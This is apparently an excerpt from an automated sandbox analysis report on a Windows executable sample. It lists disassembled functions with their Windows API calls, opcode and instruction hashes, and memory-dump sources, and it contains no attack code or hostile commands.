                                                                  • Instruction ID: e63f41d058283e0c0eb0ae7a93c28366d44745800656fe3e600f804c74b5ca7e
                                                                  • Opcode Fuzzy Hash: 02d30d9259a4a2bad5bd7c57acdfbd4e8b1d24c0360f644a24d44c51bf277f00
                                                                  • Instruction Fuzzy Hash: E2312971904701EADB249F36AD45BDB37A4DF95314F24447BF909E2282FB7C8981839D
                                                                  Function 00421EC1 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageA.USER32(00000000,00000405,00000000,?), ref: 00421F77
                                                                  • GetWindowLongA.USER32(?,000000FC), ref: 00421F89
                                                                  • GetWindowLongA.USER32(?,000000FC), ref: 00421F9A
                                                                  • SetWindowLongA.USER32(?,000000FC,?), ref: 00421FB6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: LongWindow$MessageSend
                                                                  • String ID: (
                                                                  • API String ID: 2178440468-3887548279
                                                                  • Opcode ID: db8b89a14fc87ba1fce35da2007820129314c722bc1527cb392caf885202c5e2
                                                                  • Instruction ID: 4f815d2d5e0452abf6b21b186733e73ea544739a7e03d6a9e74580ef656ef9a0
                                                                  • Opcode Fuzzy Hash: db8b89a14fc87ba1fce35da2007820129314c722bc1527cb392caf885202c5e2
                                                                  • Instruction Fuzzy Hash: 063105353003249FCB20AF6AE984A6FB7B4BF14314F95052EF552977A1DB39E805CB98
                                                                  Function 0041FF75 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 0041FFB6
                                                                  • GetDlgItem.USER32(?,00000002), ref: 0041FFD5
                                                                  • IsWindowEnabled.USER32(00000000), ref: 0041FFE0
                                                                  • SendMessageA.USER32(?,00000111,00000002,00000000), ref: 0041FFF6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Window$EnabledItemLongMessageSend
                                                                  • String ID: Edit
                                                                  • API String ID: 3499652902-554135844
                                                                  • Opcode ID: b63e96ee084e1519c21dae61d460767de6b5ab3118784dc55616f40cff51c415
                                                                  • Instruction ID: 3fda86f08f798bfc712dbe9114479d5ed61c9c1c5043182bfc70c8b50dcb543f
                                                                  • Opcode Fuzzy Hash: b63e96ee084e1519c21dae61d460767de6b5ab3118784dc55616f40cff51c415
                                                                  • Instruction Fuzzy Hash: EF01C830300221AAFA302A26BC05B9BB7966F11759F94443BF402D12A2CBE9DCC6C55C
                                                                  Function 00416AB0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 29libraryloaderCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,00432A70,00000010,004107C0,00000000,00000FA0,76230A60,00000000,00411F62,0040E8F2,?,00431A70,00000060), ref: 00416AD3
                                                                  • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionAndSpinCount), ref: 00416AE3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: InitializeCriticalSectionAndSpinCount$`#vp,$v$kernel32.dll
                                                                  • API String ID: 1646373207-1530109648
                                                                  • Opcode ID: 555e332292ca30733b42562bae4a1dc6fe38cd6b3bc813339523b37f08c96110
                                                                  • Instruction ID: ce44358daea0c9ea577a3d839c8de632687c57e94c437d53c63a589a871009e4
                                                                  • Opcode Fuzzy Hash: 555e332292ca30733b42562bae4a1dc6fe38cd6b3bc813339523b37f08c96110
                                                                  • Instruction Fuzzy Hash: 86F05430740302EFDB28AFA5DD05B8E36A4AF45394F64D17BA412E26A0D7BCD9849A1D
                                                                  Function 004169F6 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 13libraryloaderCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(KERNEL32,00410526), ref: 004169FB
                                                                  • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00416A0B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: IsProcessorFeaturePresent$KERNEL32$`#vp,$v
                                                                  • API String ID: 1646373207-3967587774
                                                                  • Opcode ID: 930357ea9b2b054f3e33310345d67954e3ef867d834dfbee0a7fbed3febea94e
                                                                  • Instruction ID: f7e75c8983afe75b452e8c5a0e3795a3a9e97458d4fb11f8d1bffce13407fbee
                                                                  • Opcode Fuzzy Hash: 930357ea9b2b054f3e33310345d67954e3ef867d834dfbee0a7fbed3febea94e
                                                                  • Instruction Fuzzy Hash: BCC01270350300AAE9606B622D19F56218C6F18B83F1904667503F01A0CB68C081653D
                                                                  Function 0042B2F3 Relevance: 7.7, APIs: 5, Instructions: 236stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 0042B2F8
                                                                  • lstrlenA.KERNEL32(?,?,00000000), ref: 0042B323
                                                                  • VariantClear.OLEAUT32(0000000C), ref: 0042B47F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: ClearH_prologVariantlstrlen
                                                                  • String ID:
                                                                  • API String ID: 2416264355-0
                                                                  • Opcode ID: b89cfb44284379472a5c7ef7bc3bacdfcdfa9a3b5cd4a3f6bd749639aea81153
                                                                  • Instruction ID: 2154954aee45bc9f37d5e476858aa3f54607d5b4520b193f721ce322dcdb1a24
                                                                  • Opcode Fuzzy Hash: b89cfb44284379472a5c7ef7bc3bacdfcdfa9a3b5cd4a3f6bd749639aea81153
                                                                  • Instruction Fuzzy Hash: 9381D471A01629EBCF10DF55E881AAEBBB0FF05358F90851AF854AB251C738D991CBD8
                                                                  Function 004121F8 Relevance: 7.7, APIs: 5, Instructions: 184COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualQuery.KERNEL32(?,?,0000001C,?,?,?,?,?,0040E699,?), ref: 004122AB
                                                                  • InterlockedExchange.KERNEL32(0043F6C8,00000001), ref: 00412329
                                                                  • InterlockedExchange.KERNEL32(0043F6C8,00000000), ref: 0041238E
                                                                  • InterlockedExchange.KERNEL32(0043F6C8,00000001), ref: 004123B2
                                                                  • InterlockedExchange.KERNEL32(0043F6C8,00000000), ref: 00412412
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: ExchangeInterlocked$QueryVirtual
                                                                  • String ID:
                                                                  • API String ID: 2947987494-0
                                                                  • Opcode ID: 6a17d818e742434f057d2ba6d72ccd2d10828a07a170a6c333869a08031e37f3
                                                                  • Instruction ID: d666452b32fb370f5039d9c4d9c953f1fa938a618f22207ba933b66a0757dcd5
                                                                  • Opcode Fuzzy Hash: 6a17d818e742434f057d2ba6d72ccd2d10828a07a170a6c333869a08031e37f3
                                                                  • Instruction Fuzzy Hash: 8F511530A006158FCB288F28DB817EA73A5BB49314F64957BD851C72A1E3FCDCE2864D
                                                                  Function 00412B89 Relevance: 7.7, APIs: 5, Instructions: 172COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetStartupInfoA.KERNEL32(?), ref: 00412BE6
                                                                  • GetFileType.KERNEL32(?), ref: 00412C90
                                                                  • GetStdHandle.KERNEL32(-000000F6), ref: 00412D11
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: FileHandleInfoStartupType
                                                                  • String ID:
                                                                  • API String ID: 2461013171-0
                                                                  • Opcode ID: a41e6a2bdbcd81d841d3acfd68b2595e2d0e9f73fc32f30227e20274102ae087
                                                                  • Instruction ID: d278a9e66e7a289658028d0007e01ec58958c44d3a53fc808e972aab8f93b423
                                                                  • Opcode Fuzzy Hash: a41e6a2bdbcd81d841d3acfd68b2595e2d0e9f73fc32f30227e20274102ae087
                                                                  • Instruction Fuzzy Hash: 6A512A702047418FD7208F68DD847A677E4FB12328F24863ED696CB2E1E7B8D4A6C749
                                                                  Function 0040F2EB Relevance: 7.6, APIs: 5, Instructions: 150COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4a9960bd93fec852de473eb3548affb155960367c54875f566ccfefcf4308e7d
                                                                  • Instruction ID: cd14ed6faf968c26f5ad3f682f5955487037b3cb07160dd73ebcc5381cbba43c
                                                                  • Opcode Fuzzy Hash: 4a9960bd93fec852de473eb3548affb155960367c54875f566ccfefcf4308e7d
                                                                  • Instruction Fuzzy Hash: 3341F3B1D00225AACF30BFA69C848AFBA74EB55728710453FFD15B66D1D33C4D898A9C
                                                                  Function 00404812 Relevance: 7.6, APIs: 5, Instructions: 133COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FindResourceA.KERNEL32(?,?,000000F0), ref: 0040483B
                                                                  • LoadResource.KERNEL32(?,00000000), ref: 00404847
                                                                  • LockResource.KERNEL32(00000000), ref: 0040485C
                                                                  • FreeResource.KERNEL32(00000000), ref: 0040488F
                                                                  • GetDlgItem.USER32(?,00000000), ref: 00404939
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Resource$FindFreeItemLoadLock
                                                                  • String ID:
                                                                  • API String ID: 996205394-0
                                                                  • Opcode ID: 4237aaeb46cccb602a0984120901f33fbc0742d29dd2597d22a60c95cf2cdb97
                                                                  • Instruction ID: 6aec8b371c9fab22d9bb11c82ff679e6f8f2bf4797d8e8c33563a997009e8f8d
                                                                  • Opcode Fuzzy Hash: 4237aaeb46cccb602a0984120901f33fbc0742d29dd2597d22a60c95cf2cdb97
                                                                  • Instruction Fuzzy Hash: DF514EB5A00209EFCB14DF66C484AAEBBB5FF84314F14847AE916AB391D738E941CF54
                                                                  Function 004070AF Relevance: 7.6, APIs: 5, Instructions: 126windowthreadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 004070B4
                                                                  • SendMessageA.USER32(?,00000138,?,?), ref: 00407138
                                                                  • GetBkColor.GDI32(?), ref: 00407141
                                                                  • GetTextColor.GDI32(?), ref: 0040714D
                                                                  • GetThreadLocale.KERNEL32(0000F1C0), ref: 004071DF
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Color$H_prologLocaleMessageSendTextThread
                                                                  • String ID:
                                                                  • API String ID: 741590120-0
                                                                  • Opcode ID: 690d7af245a93de95a2d746acce73e69c4852c2c64f9a7fa874139ff42539c16
                                                                  • Instruction ID: 20cee96fae53f77c6612ec2f8febb233d27f76521b7ee9c4483379ac0ab0fb9c
                                                                  • Opcode Fuzzy Hash: 690d7af245a93de95a2d746acce73e69c4852c2c64f9a7fa874139ff42539c16
                                                                  • Instruction Fuzzy Hash: 7C518E30904306DFCB10EF65C8445AAB7B0FF44314B10896EF856AB3A1E778B955CB6A
                                                                  Function 00426F77 Relevance: 7.6, APIs: 5, Instructions: 102windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00426ED9: GetParent.USER32(?), ref: 00426F2C
                                                                    • Part of subcall function 00426ED9: GetLastActivePopup.USER32(?), ref: 00426F3B
                                                                    • Part of subcall function 00426ED9: IsWindowEnabled.USER32(?), ref: 00426F50
                                                                    • Part of subcall function 00426ED9: EnableWindow.USER32(?,00000000), ref: 00426F63
                                                                  • EnableWindow.USER32(?,00000001), ref: 00426FB7
                                                                  • SendMessageA.USER32(?,00000376,00000000,00000000), ref: 00426FCB
                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,?,00000000), ref: 00427041
                                                                  • MessageBoxA.USER32(?,?,?,000000F0), ref: 00427065
                                                                  • EnableWindow.USER32(?,00000001), ref: 00427081
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Window$Enable$Message$ActiveEnabledFileLastModuleNameParentPopupSend
                                                                  • String ID:
                                                                  • API String ID: 489645344-0
                                                                  • Opcode ID: 42c07a88efa4cedc6cfd4f5157a7262d5df472f227f5db3fb4d65e13e20a45ba
                                                                  • Instruction ID: 94a83bf1e9e898c293309cd3d0189100989e43beb641fad24fa4ba7b3a2eaaf4
                                                                  • Opcode Fuzzy Hash: 42c07a88efa4cedc6cfd4f5157a7262d5df472f227f5db3fb4d65e13e20a45ba
                                                                  • Instruction Fuzzy Hash: 4531E531B043689FEF309FA5ED80B9EB7B4AF05700F55002EEA05AB281DBB99D058B55
                                                                  Function 0042867C Relevance: 7.6, APIs: 5, Instructions: 70registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00428681
                                                                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 004286AA
                                                                  • RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 004286CE
                                                                  • RegDeleteKeyA.ADVAPI32(?,?), ref: 00428761
                                                                  • RegCloseKey.ADVAPI32(?), ref: 0042876F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: CloseDeleteEnumH_prologOpen
                                                                  • String ID:
                                                                  • API String ID: 3131381098-0
                                                                  • Opcode ID: 3da1cfe8e0bdcdf6bb3580b66696eb1dbd77266631f15c1d34462537c3854d5f
                                                                  • Instruction ID: 3b1ea214686a536e0a2d4bea5f1d2e89e807bfaa4abb09b0d42beed4e779e599
                                                                  • Opcode Fuzzy Hash: 3da1cfe8e0bdcdf6bb3580b66696eb1dbd77266631f15c1d34462537c3854d5f
                                                                  • Instruction Fuzzy Hash: 6521BC32E00128AFDB21DB54DC44BEEB7B4FB08310F0042AAE855B72A0CB388E51DF94
                                                                  Function 004272B3 Relevance: 7.6, APIs: 5, Instructions: 67windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00423C94: GetDlgItem.USER32(?,?), ref: 00423CA1
                                                                  • SendMessageA.USER32(?,00000087,00000000,00000000), ref: 004272F4
                                                                  • SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 00427308
                                                                  • SendMessageA.USER32(?,000000F1,00000000,00000000), ref: 0042732E
                                                                  • GetWindow.USER32(?,00000002), ref: 00427338
                                                                  • GetWindowLongA.USER32(00000000,000000F0), ref: 00427348
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Window$ItemLong
                                                                  • String ID:
                                                                  • API String ID: 1613074769-0
                                                                  • Opcode ID: 97cbf4e57a23a0da11286c9286a259086bce15a030b63461e7beaaeda3af21d2
                                                                  • Instruction ID: fe25e8e1c6ca3775ff26ef85d9a3a830e02c818cf282e5b9224e09687ff5b461
                                                                  • Opcode Fuzzy Hash: 97cbf4e57a23a0da11286c9286a259086bce15a030b63461e7beaaeda3af21d2
                                                                  • Instruction Fuzzy Hash: FC116D7120422AFFDF109F51EC84EAA7B29FF443A4F508126FD154A2A0CB34AD51DBA4
                                                                  Function 0042C0CB Relevance: 7.6, APIs: 5, Instructions: 58networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: ErrorH_prologLastgethostbynamehtonsinet_addr
                                                                  • String ID:
                                                                  • API String ID: 3864313882-0
                                                                  • Opcode ID: 4b5bd378ccf6621e41f5217fc09554331f5af7f9c8d6f30778e4ca4430e9895b
                                                                  • Instruction ID: 55ba63c0e82c93a398f165e94c6545409e9e25af3e370e3a1538512de266e412
                                                                  • Opcode Fuzzy Hash: 4b5bd378ccf6621e41f5217fc09554331f5af7f9c8d6f30778e4ca4430e9895b
                                                                  • Instruction Fuzzy Hash: 4D116D31A00228DFCB10EFA5E8859EDBBB4FF08754F40456AF405A72A1D7389A51CF99
                                                                  Function 00427DB5 Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetMapMode.GDI32(?,?,?,?,?,?,00407712,?,00000000,?,7694E800), ref: 00427DC5
                                                                  • GetDeviceCaps.GDI32(?,00000058), ref: 00427DFF
                                                                  • GetDeviceCaps.GDI32(?,0000005A), ref: 00427E08
                                                                    • Part of subcall function 00426049: MulDiv.KERNEL32(?,00000000,00000000), ref: 00426089
                                                                    • Part of subcall function 00426049: MulDiv.KERNEL32(00000000,00000000,00000000), ref: 004260A6
                                                                  • MulDiv.KERNEL32(?,000009EC,00000060), ref: 00427E2C
                                                                  • MulDiv.KERNEL32(00000000,000009EC,7694E800), ref: 00427E37
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: CapsDevice$Mode
                                                                  • String ID:
                                                                  • API String ID: 696222070-0
                                                                  • Opcode ID: 4f3f8492715973c01261396f95e4a9daf1e0a3e3b78cb544d1ec3266c9131d15
                                                                  • Instruction ID: 2e381f7fe369a97062e71ca8c090e36ae9c4614a4b77d937c301da42c517efac
                                                                  • Opcode Fuzzy Hash: 4f3f8492715973c01261396f95e4a9daf1e0a3e3b78cb544d1ec3266c9131d15
                                                                  • Instruction Fuzzy Hash: E711C231700624AFDB21AF5ADC44C2EBBA9FF88710752042AFA4597360C775AC028F94
                                                                  Function 00411DA5 Relevance: 7.5, APIs: 5, Instructions: 37threadCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetLastError.KERNEL32(?,00000000,0040F9CC,004108AA,00000000,00431B30,00000008,00410901,?,?,?,00410723,00000004,00431B20,00000010,0041200F), ref: 00411DA7
                                                                  • FlsGetValue.KERNEL32(?,00410723,00000004,00431B20,00000010,0041200F,00000001,0000008C,?,00431A70,00000060), ref: 00411DB5
